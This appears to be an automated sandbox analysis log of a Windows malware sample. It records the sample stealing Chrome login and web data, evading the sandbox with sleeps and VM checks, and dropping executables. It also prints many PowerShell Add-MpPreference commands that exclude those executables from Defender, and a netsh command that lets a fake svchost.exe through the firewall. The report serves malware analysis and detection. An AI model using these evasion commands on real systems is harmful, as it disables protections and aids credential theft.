NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0

A process attempted to delay the analysis task. (1 event)

description

File.exe tried to sleep 357 seconds, actually delayed analysis time by 357 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceW June 21, 2021, 12:58 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1	0
GetDiskFreeSpaceW June 21, 2021, 12:58 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1	0

Steals private information from local Internet browsers (50 out of 63 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal

Creates executable files on the filesystem (17 events)

file	C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat
file	C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\test.bat
file	C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\test.bat
file	C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe
file	C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe
file	C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\test.bat
file	C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat
file	C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\AdvancedRun.exe
file	C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\AdvancedRun.exe
file	C:\Users\test22\AppData\Roaming\Install\Host.exe
file	C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\test.bat
file	C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\AdvancedRun.exe
file	C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe
file	C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
file	C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe
file	C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\AdvancedRun.exe
file	C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\test.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (28 events)

cmdline	powershell Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
cmdline	netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
cmdline	powershell Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
cmdline	C:\Windows\syswow64\svchost.exe
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
cmdline	cmd.exe /c timeout 1
cmdline	"C:\Windows\System32\cmd.exe" /c timeout 1
cmdline	"C:\ProgramData\svchost.exe"
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
cmdline	C:\ProgramData\svchost.exe

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
file	C:\Users\test22\AppData\Local\Temp\File.exe
file	C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe
file	C:\ProgramData\svchost.exe

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe
file	C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
file	C:\Users\test22\AppData\Local\Temp\File.exe

A process created a hidden window (50 out of 58 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 21, 2021, 12:56 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c timeout 1 filepath: cmd.exe	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath: C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c timeout 1 filepath: cmd.exe	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\AdvancedRun.exe parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath: C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\AdvancedRun.exe	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c timeout 1 filepath: cmd.exe	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\AdvancedRun.exe parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath: C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\AdvancedRun.exe	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:57 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c timeout 1 filepath: cmd.exe	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath: C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c timeout 1 filepath: cmd.exe	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\AdvancedRun.exe parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath: C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\AdvancedRun.exe	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force filepath: powershell	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force filepath: powershell	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 51 events)

Time & API	Arguments	Status	Return
Process32NextW June 21, 2021, 12:56 p.m.	snapshot_handle: 0x00000108 process_name: mobsync.exe process_identifier: 1420	1	1
Process32NextW June 21, 2021, 12:56 p.m.	snapshot_handle: 0x00000108 process_name: pw.exe process_identifier: 6252	1	1
Process32NextW June 21, 2021, 12:56 p.m.	snapshot_handle: 0x00000108 process_name: cmd.exe process_identifier: 3972	1	1
Process32NextW June 21, 2021, 12:56 p.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 8072	1	1
Process32NextW June 21, 2021, 12:56 p.m.	snapshot_handle: 0x00000108 process_name: pw.exe process_identifier: 7140	1	1
Process32NextW June 21, 2021, 12:56 p.m.	snapshot_handle: 0x00000108 process_name: File.exe process_identifier: 8024	1	1
Process32NextW June 21, 2021, 12:56 p.m.	snapshot_handle: 0x00000108 process_name: slui.exe process_identifier: 1520	1	1
Process32NextW June 21, 2021, 12:56 p.m.	snapshot_handle: 0x00000108 process_name: AdvancedRun.exe process_identifier: 6928	1	1
Process32NextW June 21, 2021, 12:56 p.m.	snapshot_handle: 0x00000108 process_name: TrustedInstaller.exe process_identifier: 8992	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 2224	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 8044	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: pw.exe process_identifier: 5252	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: File.exe process_identifier: 2488	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: AdvancedRun.exe process_identifier: 3284	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x000000c0 process_name: svchost.exe process_identifier: 6664	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: ULWTCCYCJS.exe process_identifier: 8684	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: svchost.exe process_identifier: 6852	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: AdvancedRun.exe process_identifier: 5496	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe process_identifier: 2980	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: Host.exe process_identifier: 1828	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: cmd.exe process_identifier: 1720	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 3936	1	1
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: pw.exe process_identifier: 2968	1	1
